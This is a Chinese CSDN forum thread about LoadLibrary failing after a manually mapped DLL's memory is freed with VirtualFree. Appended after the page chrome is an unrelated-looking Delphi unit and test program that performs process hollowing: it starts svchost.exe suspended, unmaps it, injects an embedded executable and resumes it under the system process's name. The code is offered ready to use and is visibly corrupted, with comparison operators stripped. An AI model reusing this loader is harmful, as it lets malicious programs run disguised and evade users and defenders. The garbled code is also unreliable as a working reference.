VirtualFree后 loadLibrary失败....

imdemon 2009-06-19 06:20:23

大家好...

我碰到个问题..需要对WINDOWS内存机制比较熟悉的朋友指点..

情况是这样...

我将系统DLL读入内存(比如kernel32)-----是通过VirtualAlloc分配的内存

代码大意如下:
code = (unsigned char *)VirtualAlloc(NULL,
SizeOfImage,
MEM_RESERVE,
PAGE_READWRITE);


VirtualAlloc(code,
SizeOfImage,
MEM_COMMIT,
PAGE_READWRITE);


根据调试,分配的这片内存地址大概是:00EA1000,大小大概是01D00000
之后对这片内存做一系列处理....

然后我将这片内存VirtualFree掉
VirtualFree(Base, 0, MEM_RELEASE);


之后,程序进入下一步,却在LoadLibrary处出错,...
调试显示原因是00EA1210不可读..显然,是因为这片内存被我VirtualFree掉的缘故.

但是我很奇怪...这片内存本来就是我VirtualAlloc得到的,VirtualFree掉理所当然.

Loadlibrary如果要使用这个地址的内存,应该自己去VirtualAlloc得到才对.

我将VirtualFree的代码去掉,程序能运行--至少不崩溃.


为什么会这样?能解释一下么?
...全文
1214 45 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
45 条回复
切换为时间正序
请发表友善的回复…
发表回复
IORI915189 2009-06-25
  • 打赏
  • 举报
回复
你的 函数使用 可能有点问题 具体的看下面VirtualFree 参数说明

试试 在申请时用 MEM_COMMIT 释放时 用MEM_DECOMMIT
尽量把申请的长度也传递给VirtualFree


VC声明
  BOOL VirtualFree(
  LPVOID lpAddress, // 区域地址
  SIZE_T dwSize, // 区域大小
  DWORD dwFreeType // 类型
  );
说明
  该函数的功能是取消或者释放调用进程的虚地址空间页的一个区域
  如果想释放一块调用VirtualAllocEx函数分配的内存(包括虚拟内存),就使用VirtualFreeEx函数
参数说明
  LPVOID lpAddress, 要释放的页的区域的地址,如果dwFreeType指定为MEM_RELEASE且这个区域是被保留的话,那么这个地址就要指定为分配区域的首地址
  SIZE_T dwSize, 要释放页的大小,如果dwFreeType类型中包含了MEN_RELEASE(应该是MEM_RELEASE),则dwSize必须为0
  DWORD dwFreeType 类型说明
  MEM_DECOMMIT 取消VirtualAlloc提交的页
  MEM_RELEASE 释放指定页,如果指定了这个类型而dwSize为设置为0,则函数会调用失败
一笑拔剑 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 23 楼 arong1234 的回复:]
我觉得这依赖于LoadLibrary怎么确保dll的唯一性的算法。如果你所谓的修改使得LoadLibrary认为那个内存位置已经有了一个该dll的实例,他不会重新分配内存来放他自己东西的(如果每次都分配,loadlibrary显然无法保证dll的唯一性),我想这回答你“LoadLibrary应该自己VirtualAlloc”的问题了吧?
至于你所谓的修改,我个人觉得你应该在LoadLibrary之后去到对应的位置去找,而不应该自己先load一遍

你要么自己实现一个完整的…
[/Quote]
有道理
估计lz是想反hook
反hook有很多办法的
自己模拟LoadLibrary比较靠谱
arong1234 2009-06-22
  • 打赏
  • 举报
回复
我觉得这依赖于LoadLibrary怎么确保dll的唯一性的算法。如果你所谓的修改使得LoadLibrary认为那个内存位置已经有了一个该dll的实例,他不会重新分配内存来放他自己东西的(如果每次都分配,loadlibrary显然无法保证dll的唯一性),我想这回答你“LoadLibrary应该自己VirtualAlloc”的问题了吧?
至于你所谓的修改,我个人觉得你应该在LoadLibrary之后去到对应的位置去找,而不应该自己先load一遍

你要么自己实现一个完整的LoadLibrary,不要再使用系统缺省的LoadLibrary去载入那个dll,我觉得你的算法不伦不类的,使得系统api都糊涂了
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 18 楼 wocow3 的回复:]
跟LoadLibrary没什么关系吧,WSOCK32.dll的preferred基地址是0x71A40000
跟地址00EA1210不相干
[/Quote]

有一个事我得交代一下...我的机器装了卡巴,所以LoadLibrary被卡巴做了HOOK,应该是跳到卡巴的R0空间里去了:A8A61C30

这导致的结果是我无法的R3下进一步单步调试LoadLibrary

但是...这应该不能成为出现这种问题的理由...因为我的客户如果装了卡巴,我还是得在我自己这儿做改动让程序不出问题.
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 19 楼 na_he 的回复:]
貌似那边内存没有被释放,在释放之前确保在unlock的情况下面。
[/Quote]

我没有lock内存的代码呀....

请问如何在释放之前确保在unlock??
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 18 楼 wocow3 的回复:]
跟LoadLibrary没什么关系吧,WSOCK32.dll的preferred基地址是0x71A40000
跟地址00EA1210不相干
[/Quote]

很奇怪,根据调试--我用的调试器是OD,就是在LoadLibrary处出的错...所以我很郁闷...


00768EB7 FF15 C4B07700 call dword ptr [<&KERNEL32.LoadLibrar>; kernel32.LoadLibraryA
参数
0012FF64 0063C914 \FileName = "WSOCK32.dll"


兄弟对于找出错误的代码位置有什么建议么?
na_he 2009-06-22
  • 打赏
  • 举报
回复
貌似那边内存没有被释放,在释放之前确保在unlock的情况下面。
wocow3 2009-06-22
  • 打赏
  • 举报
回复
跟LoadLibrary没什么关系吧,WSOCK32.dll的preferred基地址是0x71A40000
跟地址00EA1210不相干
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 16 楼 aspower_ 的回复:]
你在VirtualFree释放前
VirtualProtect设置内存权限试下

LoadLibrary不会自己修改内存权限的
[/Quote]


释放前的权限修改,释放后应该就没有意义了吧?

不过我已经有点绝望了,只要有一线希望我还真这么做了..但是错误继续...
DWORD dwOldProtect;
VirtualProtect(codeBase, SizeOfImage, PAGE_EXECUTE_READWRITE, &dwOldProtect);
// 释放内存
VirtualFree(codeBase, 0, MEM_RELEASE);

一笑拔剑 2009-06-22
  • 打赏
  • 举报
回复
你在VirtualFree释放前
VirtualProtect设置内存权限试下

LoadLibrary不会自己修改内存权限的
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 13 楼 aspower_ 的回复:]
引用 10 楼 imdemon 的回复:
引用 8 楼 wocow3 的回复:
Loadlibrary?
你怎么确定DLL load到了00EA1000这个地址


你好..不是DLL load到了这个地址...

是之前我为了对DLL做一些处理,申请了00EA1000这个地址的内存...然后我释放掉了这片内存

之后,我的代码调用了Loadlibrary,然后出错...提示的错误是00EA1210内存不可读


既然是不可读
你重新设置那片内存的权限啊
VirtualProtect
[/Quote]

问题是..那片内存被我VirtualFree掉了....我怎么去设置权限呢...

系统的LoadLibrary如果要使用那片内存,应该自己申请,自己设置权限才对啊...


整个流程是这样的

|
|
我virtualAlloc申请内存--分配的这片内存地址大概是:00EA1000,大小大概是01D00000
|
|
我对00EA1000这片内存做一些处理,
|
|
我VirtualFree释放掉00EA1000这片内存
|
|
我调用LoadLibrary加载DLL,比如WSOCK32.DLL 这里出错,提示的错误是:00EA1210内存不可读

如果系统的LoadLibrary要使用00EA1210这片内存,应该自己去申请,自己设置权限才对啊..




NTooL 2009-06-22
  • 打赏
  • 举报
回复
帮顶。
一笑拔剑 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 10 楼 imdemon 的回复:]
引用 8 楼 wocow3 的回复:
Loadlibrary?
你怎么确定DLL load到了00EA1000这个地址



你好..不是DLL load到了这个地址...

是之前我为了对DLL做一些处理,申请了00EA1000这个地址的内存...然后我释放掉了这片内存

之后,我的代码调用了Loadlibrary,然后出错...提示的错误是00EA1210内存不可读
[/Quote]
既然是不可读
你重新设置那片内存的权限啊
VirtualProtect
jaron05447 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 7 楼 imdemon 的回复:]
引用 5 楼 jaron05447 的回复:
还有一种可能,代码有问题。。
多线程跑的情况下,有内存违规。。那么调试的时候,就在那出了问题。。

或者那段代码有踩内存。


你好,能具体说说么?我要怎么确定内存违规的代码处?
[/Quote]

相关代码的内存不初始化,极端容易引发此类问题。
当时不出问题,等你跑啊跑的,出错啦。。让你头都摸不到。。

还有就是你在什么地方释放了内存,但是没有将指针置空(置空的时候要注意是不是指针的拷贝体),也会在你想不到的时候出现问题。
zhanghongbo1126 2009-06-22
  • 打赏
  • 举报
回复
非常的问题。
我以前开了三个线程。加载两个Dll。

就出现了这个问题。 郁闷了好多天。后来换方法做了。

希望能大家给解释解释。

我也迫切希望答案。

imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 8 楼 wocow3 的回复:]
Loadlibrary?
你怎么确定DLL load到了00EA1000这个地址
[/Quote]

你好..不是DLL load到了这个地址...

是之前我为了对DLL做一些处理,申请了00EA1000这个地址的内存...然后我释放掉了这片内存

之后,我的代码调用了Loadlibrary,然后出错...提示的错误是00EA1210内存不可读
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 imdemon 的回复:]
引用 4 楼 arong1234 的回复:
我估计在载入时系统去搜索是不是已经载入被你此前的操作给误导了,你怎么读入内存,读入后又做什么处理?处理的目的又是什么?如果和你载入无关,你为什么要做这个?如果有关,说明你需要想想这样做的合理性了



是这样,我将DLL读入内存:主要是做一下的工作:处理Section(PE格式),重定位,建导入表 等于自己实现一个Loadlibrary,以使我可以调用该DLL导出的函数.
这期间所需的内存我都是通过…
[/Quote]

我甚至还模拟调用了DLL_PROCESS_DETACH和DLL_PROCESS_ATTACH的过程...
wocow3 2009-06-22
  • 打赏
  • 举报
回复
Loadlibrary?
你怎么确定DLL load到了00EA1000这个地址
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 5 楼 jaron05447 的回复:]
还有一种可能,代码有问题。。
多线程跑的情况下,有内存违规。。那么调试的时候,就在那出了问题。。

或者那段代码有踩内存。
[/Quote]

你好,能具体说说么?我要怎么确定内存违规的代码处?
imdemon 2009-06-22
  • 打赏
  • 举报
回复
[Quote=引用 4 楼 arong1234 的回复:]
我估计在载入时系统去搜索是不是已经载入被你此前的操作给误导了,你怎么读入内存,读入后又做什么处理?处理的目的又是什么?如果和你载入无关,你为什么要做这个?如果有关,说明你需要想想这样做的合理性了
[/Quote]

是这样,我将DLL读入内存:主要是做一下的工作:处理Section(PE格式),重定位,建导入表 等于自己实现一个Loadlibrary,以使我可以调用该DLL导出的函数.
这期间所需的内存我都是通过VirtualAlloc申请的
得到我需要的导出函数并调用之后,我将内存释放,使用VirtualFree释放


这个过程有什么不合理的地方么?我没看出来啊....


加载更多回复(25)
unit PE; interface uses windows; function MemExecute(const ABuffer; Len: Integer; CmdParam: string; var ProcessId: Cardinal): Cardinal; implementation type TImageSectionHeaders = array[0..0] of TImageSectionHeader; PImageSectionHeaders = ^TImageSectionHeaders; { 计算对齐后的大小 } function GetAlignedSize(Origin, Alignment: Cardinal): Cardinal; begin result := (Origin + Alignment - 1) div Alignment * Alignment; end; { 计算加载pe并对齐需要占用多少内存,未直接使用OptionalHeader.SizeOfImage作为结果是因为据说有的编译器生成的exe这个值会填0 } function CalcTotalImageSize(MzH: PImageDosHeader; FileLen: Cardinal; peH: PImageNtHeaders; peSecH: PImageSectionHeaders): Cardinal; var i: Integer; begin {计算pe头的大小} result := GetAlignedSize(PeH.OptionalHeader.SizeOfHeaders, PeH.OptionalHeader.SectionAlignment); {计算所有节的大小} for i := 0 to peH.FileHeader.NumberOfSections - 1 do if peSecH[i].PointerToRawData + peSecH[i].SizeOfRawData > FileLen then // 超出文件范围 begin result := 0; exit; end else if peSecH[i].VirtualAddress 0 then //计算对齐后某节的大小 if peSecH[i].Misc.VirtualSize 0 then result := GetAlignedSize(peSecH[i].VirtualAddress + peSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment) else result := GetAlignedSize(peSecH[i].VirtualAddress + peSecH[i].SizeOfRawData, PeH.OptionalHeader.SectionAlignment) else if peSecH[i].Misc.VirtualSize < peSecH[i].SizeOfRawData then result := result + GetAlignedSize(peSecH[i].SizeOfRawData, peH.OptionalHeader.SectionAlignment) else result := result + GetAlignedSize(peSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment); end; { 加载pe到内存并对齐所有节 } function AlignPEToMem(const Buf; Len: Integer; var PeH: PImageNtHeaders; var PeSecH: PImageSectionHeaders; var Mem: Pointer; var ImageSize: Cardinal): Boolean; var SrcMz: PImageDosHeader; // DOS头 SrcPeH: PImageNtHeaders; // PE头 SrcPeSecH: PImageSectionHeaders; // 节表 i: Integer; l: Cardinal; Pt: Pointer; begin result := false; SrcMz := @Buf; if Len < sizeof(TImageDosHeader) then exit; if SrcMz.e_magic IMAGE_DOS_SIGNATURE then exit; if Len < SrcMz._lfanew + Sizeof(TImageNtHeaders) then exit; SrcPeH := pointer(Integer(SrcMz) + SrcMz._lfanew); if (SrcPeH.Signature IMAGE_NT_SIGNATURE) then exit; if (SrcPeH.FileHeader.Characteristics and IMAGE_FILE_DLL 0) or (SrcPeH.FileHeader.Characteristics and IMAGE_FILE_EXECUTABLE_IMAGE = 0) or (SrcPeH.FileHeader.SizeOfOptionalHeader SizeOf(TImageOptionalHeader)) then exit; SrcPeSecH := Pointer(Integer(SrcPeH) + SizeOf(TImageNtHeaders)); ImageSize := CalcTotalImageSize(SrcMz, Len, SrcPeH, SrcPeSecH); if ImageSize = 0 then exit; Mem := VirtualAlloc(nil, ImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // 分配内存 if Mem nil then begin // 计算需要复制的PE头字节数 l := SrcPeH.OptionalHeader.SizeOfHeaders; for i := 0 to SrcPeH.FileHeader.NumberOfSections - 1 do if (SrcPeSecH[i].PointerToRawData 0) and (SrcPeSecH[i].PointerToRawData < l) then l := SrcPeSecH[i].PointerToRawData; Move(SrcMz^, Mem^, l); PeH := Pointer(Integer(Mem) + PImageDosHeader(Mem)._lfanew); PeSecH := Pointer(Integer(PeH) + sizeof(TImageNtHeaders)); Pt := Pointer(Cardinal(Mem) + GetAlignedSize(PeH.OptionalHeader.SizeOfHeaders, PeH.OptionalHeader.SectionAlignment)); for i := 0 to PeH.FileHeader.NumberOfSections - 1 do begin // 定位该节在内存中的位置 if PeSecH[i].VirtualAddress 0 then Pt := Pointer(Cardinal(Mem) + PeSecH[i].VirtualAddress); if PeSecH[i].SizeOfRawData 0 then begin // 复制数据到内存 Move(Pointer(Cardinal(SrcMz) + PeSecH[i].PointerToRawData)^, pt^, PeSecH[i].SizeOfRawData); if peSecH[i].Misc.VirtualSize < peSecH[i].SizeOfRawData then pt := pointer(Cardinal(pt) + GetAlignedSize(PeSecH[i].SizeOfRawData, PeH.OptionalHeader.SectionAlignment)) else pt := pointer(Cardinal(pt) + GetAlignedSize(peSecH[i].Misc.VirtualSize, peH.OptionalHeader.SectionAlignment)); // pt 定位到下一节开始位置 end else pt := pointer(Cardinal(pt) + GetAlignedSize(PeSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment)); end; result := True; end; end; type TVirtualAllocEx = function(hProcess: THandle; lpAddress: Pointer; dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall; var MyVirtualAllocEx: TVirtualAllocEx = nil; function IsNT: Boolean; begin result := Assigned(MyVirtualAllocEx); end; { 生成外壳程序命令行 } function PrepareShellExe(CmdParam: string ): string; begin {这里的路径 自己定义了^_^,仅仅是外壳程序} //result:='c:\Program Files\Internet Explorer\iexplore.exe'+CmdParam ; result := 'c:\windows\system32\svchost.exe' + cmdparam; end; { 是否包含可重定向列表 } function HasRelocationTable(peH: PImageNtHeaders): Boolean; begin result := (peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress 0) and (peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size 0); end; type PImageBaseRelocation = ^TImageBaseRelocation; TImageBaseRelocation = packed record VirtualAddress: cardinal; SizeOfBlock: cardinal; end; { 重定向PE用到的地址 } procedure DoRelocation(peH: PImageNtHeaders; OldBase, NewBase: Pointer); var Delta: Cardinal; p: PImageBaseRelocation; pw: PWord; i: Integer; begin Delta := Cardinal(NewBase) - peH.OptionalHeader.ImageBase; p := pointer(cardinal(OldBase) + peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); while (p.VirtualAddress + p.SizeOfBlock 0) do begin pw := pointer(Integer(p) + Sizeof(p^)); for i := 1 to (p.SizeOfBlock - Sizeof(p^)) div 2 do begin if pw^ and $F000 = $3000 then Inc(PCardinal(Cardinal(OldBase) + p.VirtualAddress + (pw^ and $0FFF))^, Delta); inc(pw); end; p := Pointer(pw); end; end; type TZwUnmapViewOfSection = function(Handle, BaseAdr: Cardinal): Cardinal; stdcall; { 卸载原外壳占用内存 } function UnloadShell(ProcHnd, BaseAddr: Cardinal): Boolean; var M: HModule; ZwUnmapViewOfSection: TZwUnmapViewOfSection; begin result := False; m := LoadLibrary('ntdll.dll'); if m 0 then begin ZwUnmapViewOfSection := GetProcAddress(m, 'ZwUnmapViewOfSection'); if assigned(ZwUnmapViewOfSection) then result := (ZwUnmapViewOfSection(ProcHnd, BaseAddr) = 0); FreeLibrary(m); end; end; { 创建外壳进程并获取其基址、大小和当前运行状态 } function CreateChild(Cmd: string; var Ctx: TContext; var ProcHnd, ThrdHnd, ProcId, BaseAddr, ImageSize: Cardinal): Boolean; var si: TStartUpInfo; pi: TProcessInformation; Old: Cardinal; MemInfo: TMemoryBasicInformation; p: Pointer; begin FillChar(si, Sizeof(si), 0); FillChar(pi, SizeOf(pi), 0); si.cb := sizeof(si); result := CreateProcess(nil, PChar(Cmd), nil, nil, False, CREATE_SUSPENDED, nil, nil, si, pi); // 以挂起方式运行进程 if result then begin ProcHnd := pi.hProcess; ThrdHnd := pi.hThread; ProcId := pi.dwProcessId; { 获取外壳进程运行状态,[ctx.Ebx+8]内存处存的是外壳进程的加载基址,ctx.Eax存放有外壳进程的入口地址 } ctx.ContextFlags := CONTEXT_FULL; GetThreadContext(ThrdHnd, ctx); ReadProcessMemory(ProcHnd, Pointer(ctx.Ebx + 8), @BaseAddr, SizeOf(Cardinal), Old); // 读取加载基址 p := Pointer(BaseAddr); { 计算外壳进程占有的内存 } while VirtualQueryEx(ProcHnd, p, MemInfo, Sizeof(MemInfo)) 0 do begin if MemInfo.State = MEM_FREE then break; p := Pointer(Cardinal(p) + MemInfo.RegionSize); end; ImageSize := Cardinal(p) - Cardinal(BaseAddr); end; end; { 创建外壳进程并用目标进程替换它然后执行 } function AttachPE(CmdParam: string; peH: PImageNtHeaders; peSecH: PImageSectionHeaders; Ptr: Pointer; ImageSize: Cardinal; var ProcId: Cardinal): Cardinal; var s: string; Addr, Size: Cardinal; ctx: TContext; Old: Cardinal; p: Pointer; Thrd: Cardinal; begin result := INVALID_HANDLE_VALUE; s := PrepareShellExe(CmdParam + ' ' {, peH.OptionalHeader.ImageBase, ImageSize}); if CreateChild(s, ctx, result, Thrd, ProcId, Addr, Size) then begin p := nil; if (peH.OptionalHeader.ImageBase = Addr) and (Size >= ImageSize) then // 外壳进程可以容纳目标进程并且加载地址一致 begin p := Pointer(Addr); VirtualProtectEx(result, p, Size, PAGE_EXECUTE_READWRITE, Old); end else if IsNT then // 98 下失败 begin if UnloadShell(result, Addr) then // 卸载外壳进程占有内存 // 重新按目标进程加载基址和大小分配内存 p := MyVirtualAllocEx(Result, Pointer(peH.OptionalHeader.ImageBase), ImageSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (p = nil) and hasRelocationTable(peH) then // 分配内存失败并且目标进程支持重定向 begin // 按任意基址分配内存 p := MyVirtualAllocEx(result, nil, ImageSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE); if p nil then DoRelocation(peH, Ptr, p); // 重定向 end; end; if p nil then begin WriteProcessMemory(Result, Pointer(ctx.Ebx + 8), @p, Sizeof(DWORD), Old); // 重置目标进程运行环境中的基址 peH.OptionalHeader.ImageBase := Cardinal(p); if WriteProcessMemory(Result, p, Ptr, ImageSize, Old) then // 复制PE数据到目标进程 begin ctx.ContextFlags := CONTEXT_FULL; if Cardinal(p) = Addr then ctx.Eax := peH.OptionalHeader.ImageBase + peH.OptionalHeader.AddressOfEntryPoint // 重置运行环境中的入口地址 else ctx.Eax := Cardinal(p) + peH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(Thrd, ctx); // 更新运行环境 ResumeThread(Thrd); // 执行 CloseHandle(Thrd); end else begin // 加载失败,杀掉外壳进程 TerminateProcess(Result, 0); CloseHandle(Thrd); CloseHandle(Result); Result := INVALID_HANDLE_VALUE; end; end else begin // 加载失败,杀掉外壳进程 TerminateProcess(Result, 0); CloseHandle(Thrd); CloseHandle(Result); Result := INVALID_HANDLE_VALUE; end; end; end; function MemExecute(const ABuffer; Len: Integer; CmdParam: string; var ProcessId: Cardinal): Cardinal; var peH: PImageNtHeaders; peSecH: PImageSectionHeaders; Ptr: Pointer; peSz: Cardinal; begin result := INVALID_HANDLE_VALUE; if alignPEToMem(ABuffer, Len, peH, peSecH, Ptr, peSz) then begin result := AttachPE(CmdParam, peH, peSecH, Ptr, peSz, ProcessId); VirtualFree(Ptr, peSz, MEM_DECOMMIT); //VirtualFree(Ptr, 0, MEM_RELEASE); end; end; initialization MyVirtualAllocEx := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'VirtualAllocEx'); end. /////////////////////////////////////////////////////////////////////// {测试:你可以把任何一个exe文件 作成资源然后这样调用} program test; //{$APPTYPE CONSOLE} {$R 'data.res' 'data.rc'}//加入exe资源文件 uses windows, PE in 'PE.pas'; //引用上面的单元 var ProcessId: Cardinal; ResourceLocation: HRSRC; Size: Longword; ResDataHandle: THandle; ResourcePointer: PChar; begin ResourceLocation := FindResource(HInstance, 'myexe', RT_RCDATA); if ResourceLocation 0 then begin Size := SizeofResource(HInstance, ResourceLocation); if Size 0 then begin ResDataHandle := LoadResource(HInstance, ResourceLocation); if ResDataHandle 0 then begin ResourcePointer := LockResource(ResDataHandle); if ResourcePointer nil then begin MemExecute(ResourcePointer^, size, '', ProcessId);//只需这样调用即可 end; end; end; end; end.

15,473

社区成员

发帖
与我相关
我的任务
社区描述
VC/MFC 进程/线程/DLL
社区管理员
  • 进程/线程/DLL社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧